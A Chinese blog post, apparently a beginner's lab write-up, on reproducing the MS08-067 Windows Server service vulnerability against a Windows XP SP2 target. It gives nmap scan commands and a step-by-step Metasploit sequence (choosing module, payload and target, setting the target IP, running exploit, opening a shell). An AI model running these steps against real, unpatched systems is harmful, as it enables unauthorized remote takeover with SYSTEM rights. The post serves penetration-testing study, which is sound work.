Windows XP SP2 (Simplified Chinese MS08_067漏洞复现)

已于 2023-03-26 12:34:28 修改
阅读量1.8k 收藏 14
点赞数 1
分类专栏: 漏洞复现集合 文章标签: windows 系统安全 网络 安全
于 2023-03-25 16:32:39 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43093288/article/details/129767949
版权

文章目录

一、漏洞详情

MS08-067漏洞全称是“Windows Server服务RPC请求缓冲区溢出漏洞”,Windows的Server服务在处理特制RPC请求时存在缓冲区溢出漏洞。远程攻击者可以通过发送恶意的RPC请求触发这个溢出,导致完全入侵用户系统,以SYSTEM权限执行任意指令。

二、靶机搭建

kali

在这里插入图片描述

Windows XP SP2 (Simplified Chinese )

下载平台:

https://next.itellyou.cn/Original/

在这里插入图片描述

下载链接:

ed2k://|file|sc_winxp_pro_with_sp2.iso|629227520|505B810E128351482AF8B83AC4D04FD2|/

在这里插入图片描述

(1)、配置IP:在这里插入图片描述

(2)、关闭防火墙:
在这里插入图片描述

三、利用nmap对靶机扫描

(1)、利用nmap探测主机存活:

注:发现Windows XP SP2 (Simplified Chinese)的IP:172.16.12.101

nmap -sP -T4 172.16.12.0/24

在这里插入图片描述

(2)、利用nmap自带脚本对目标IP扫描:

nmap -sT -A --script=vuln -P0 172.16.12.101

注:发现Windows XP SP2 (Simplified Chinese)存在多个漏洞:ms17-010,ms08-067,且目标靶机445端口开放,但是我们现在只考虑ms08-067。

在这里插入图片描述

四、漏洞利用

(1)、搜索 MS08_067漏洞:

search ms08

在这里插入图片描述

(2)、选择MS08_067漏洞:

use  0

在这里插入图片描述

(3)、查看MS08_067漏洞的payloads:

show payloads

在这里插入图片描述

(4)、选择42号payload:

set  payload 42

在这里插入图片描述

(5)、查看MS08_067漏洞所适用的Windows版本:

show targets

在这里插入图片描述

(6)、设置对应的目标靶机Windows版本:

set target  10

在这里插入图片描述

(7)、查看payload的详细信息:

show options

在这里插入图片描述

(8)、配置靶机ip,靶机开放端口,反向连接地址为攻击机ip,设置攻击机监听tcp端口号:
注:通过nmap得知靶机开放端口为445,所以默认设置。反向连接地址为攻击机ip,攻击机监听tcp端口号默认设置

set rhosts  172.16.12.101

在这里插入图片描述

(9)、初始化攻击环境,并开始对目标靶机进行攻击:

exploit

在这里插入图片描述

(10)、进入目标系统的互交命令行shll中:

shell

在这里插入图片描述

(1)、用ipconfig验证:

ipconfig

在这里插入图片描述

五、总结

写到这里,这篇文章就介绍结束了,通过本次实验我们复现了MS08-067远程代码执行漏洞,涉及漏洞发现、验证漏洞、利用漏洞的完整过程,并利用Metasploit工具进行shell反弹及深入理解.
这也是我初入渗透测试的第一次漏洞复现,以后再接再厉,祝大家学而不缀!

caicai大师
关注
  • 1
    点赞
  • 14
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Windows XP系列全下载(均为MSDN原版)
844604778
10-13 1万+
正版windows xp sp3 下载大全(附:正版密钥) 微软MSDN Windows XP Professional下载 Windows XP Professional 简体中文 (最原始版本,无SP)【505.63MB】 文件名:CN_WINXP_PRO_ISO.img 大小:530186240字节 SHA1:73800FE8959F40361B...
windows镜像_Windows 系统镜像下载地址
weixin_39877504的博客
11-18 1万+
从微软官方网站及第三方网站搬运和整理了Windows系统镜像的下载地址,包括Windows XPWindows Vista,Windows 7, Windows 8, Windows 8.1和目前的Windows 10版本。Windows XPWindows XP RTMHome editioned2k://|file|CN_WINXP_HOME_ISO.img|513515520|58373...
Windows 7/XP
XIAOBAIMEITOFA的博客
04-09 737
本文章的 windows 分享的链接,均是迅雷下载链接,选择你要的版本复制粘贴到迅雷即可下载。【Vista 企业 SP2 】x64位。【 XP Mode】x86/64位。【 XP 家庭 SP2 】x86位。【 XP 专业 SP2 】x86位。【 XP 家庭 SP3 】x86位。【 XP 专业 SP3 】x86位。【Vista SP1 】x64位。【Vista SP1 】x86位。【Vista SP2 】x64位。【Win7 SP1 】x64位。【Win7 SP1 】x86位。【 XP SP1】x86位。
Windows XP系统下载
热门推荐
希望能找到你的答案
10-10 15万+
Windows XP Professional ed2k://|file|CN_WINXP_PRO_ISO.img|530186240|7855069CE4216615D761654E2B75A4F7|/ 文件大小:505.63MB Windows XP Professional with Service Pack 2 ed2k://|file|sc_winxp_pro_wit
MS17-010(永恒之蓝)漏洞复现
m0_63711447的博客
09-08 1522
前提:攻击机和靶机能相互ping通,靶机开通445端口且关闭防火墙 靶机Win7 (IP:192.168.88.132) 攻击机:kali(IP:192.168.88.129)
Windows XP SP3(MS08-067漏洞复现及利用)
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
08-01 2088
把以前做的实验和写在有道云里的笔记整理下,放到CSDN上 一、实验环境 靶机Windows XP SP3 专业版(关闭Windows自带的防火墙!!!) 攻击机:Kali Linux 2020 靶机IP : 192.168.204.131 攻击机IP:192.168.204.128 二、漏洞利用 msf5 > search ms08-067 Matching Modules ================ # Name D
Simplified_Chinese_PTS_Training.pdf
12-22
蓝牙PTS培训材料
AutoCAD_2016_Offline_Help_Simplified_Chinese_Win_32_64bit_dlm.sfx.exe
11-13
Autodesk CAD 离线 帮助文档 2016 超级高效有用,超级方便。其DXF方面的介绍,最全面,比市面上的不知道好多少倍。其他的,真的不能跟它比。
Windows XP Service Pack 3 (x86) 中文版 迅雷下载
03-16
Windows XP Service Pack 3 (x86) - CD (Chinese-SimplifiedXP 中文版;纯净操作系统;没有任何外挂第三方软件,微软纯净版。中文 英文 日文等等小语种均有
autocad_2020_simplified_chinese_lp_win_64bit_dlm.sfx.exe
10-19
autocad_2020_simplified_chinese_lp_win_64bit_dlm.sfx.exe
Simplified Chinese.rar
05-06
标题中的"Simplified Chinese.rar"表明这是一个简体中文版本的压缩文件,通常用于包含特定语言资源或软件的国际化版本。在本例中,它可能包含了针对简体中文用户的软件界面、文档或其他相关材料。 描述中提到的...
Fortran-Simplified-Chinese.zip_formula
09-21
FORTRAN,亦译为福传,是英文“FORmula TRANslator”的缩写,译为“公式翻译器”,它是世界上最早出现的计算机高级程序设计语言,广泛应用于科学和工程计算领域。FORTRAN语言以其特有的功能在数值、科学和工程计算...
MyBatis-Simplified-Chinese.rar_ mybatis-3_Mybatis-spring_mybatis
09-20
《MyBatis 3 用户指南 中文版》 MyBatis 是一款优秀的持久层框架,它支持定制化 SQL、存储过程以及高级映射。MyBatis 避免了几乎所有的 JDBC 代码和手动设置参数以及获取结果集。MyBatis 可以使你更好地将注意力...
徒弟进来 Windows XP SP2 制作心得
lanndmentt的专栏
11-14 1112
一、准备工作:   原材料:Windows XP SP2原版镜像(sc_win_xp_pro_with_sp2_vl.ISO,VRMPVOL_CN,592MB,MD5:f455f9a787b620aca7ac89ab47574919)   制作工具:EasyBoot、UltraEdit、UltraISO、XPlode、VMware   二、制作母盘:   1、创建目录D:\xpcd\SIMPCHI
Windows XP SP2(MS10-002漏洞复现及利用)
sGanYu
09-14 1595
攻击过程: 1)将生成URL后,将链接包装为邮件发送给被目标,诱导目标访问此链接 2)被攻击者访问URL建立TCP连接,这生成的网页会让IE浏览器程序产生缓冲区溢出 3)被攻击者执行payload后与攻击者主机建立shell的tcp连接,开启meterpreter会话 攻击机:kali/msfconsole 靶机Windows xp sp2 漏洞复现 使用metasploit框架,需要启用metasploit所依赖的postgresql数据库 在kali Linux上启动postg.
windows 弹shell_从 Windows XP 到 Vista - 微软 Longhorn 开发史:第四弹 M7 下篇
weixin_39574065的博客
10-24 537
原标题:从 Windows XP 到 Vista - 微软 Longhorn 开发史:第四弹 M7 下篇后续内容敬请关注 IT 号⚠️ 多图预警(请在网络良好条件下观看)前言Windows Vista 是微软 Windows 开发历史上过程最为艰难与一波三折的版本,也是内核变化最大的(除去 Windows 1.0 和 Windows NT 3.1一代)。Windows Vista发布之初因为性能...
MS12-020漏洞(远程桌面漏洞)(渗透笔记)
最新发布
weixin_43899811的博客
10-05 1261
小白渗透测试笔记,ms12-020漏洞
autocad_2016_offline_help_simplified_chinese_win_32_64bit
09-30
“autocad_2016_offline_help_simplified_chinese_win_32_64bit” 是指 AutoCAD 2016 的离线帮助文件,适用于简体中文的 Windows 32位和64位系统。 AutoCAD 是一款由 Autodesk 公司开发的专业计算机辅助设计(CAD)软件,被广泛应用于建筑、机械、电子等领域,用于绘制、编辑和分析二维和三维图形。离线帮助文件则是为了方便用户在没有网络连接的情况下,进行软件功能的查看和学习而提供的资料。 离线帮助文件通常包含软件的详细说明、操作指南、技巧和教程等内容,能够帮助用户了解软件的各种功能和使用方法。对于初学者来说,离线帮助文件更可以作为快速入门和问题解答的参考。同时,离线帮助文件也能够提供大量的示例和案例,供用户参考和借鉴。 “autocad_2016_offline_help_simplified_chinese_win_32_64bit” 这个离线帮助文件,针对中文用户进行优化,支持简体中文界面和操作指南,使得用户能够更加方便快速地获取软件的相关信息和技巧。 对于使用 AutoCAD 2016 的用户而言,下载并安装这个离线帮助文件可以为他们提供更加便捷的学习和使用 AutoCAD 的方式,无论是在办公室还是在无网络连接的环境中。使用这个离线帮助文件,用户可以在需要时随时查阅相关功能的说明和操作步骤,提升工作效率,减少出错的可能性。 总之,“autocad_2016_offline_help_simplified_chinese_win_32_64bit” 是一份专为 AutoCAD 2016 用户提供的中文离线帮助文件,使他们能够更好地了解和使用 AutoCAD,并在不同的工作场景中提高设计效率和质量。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值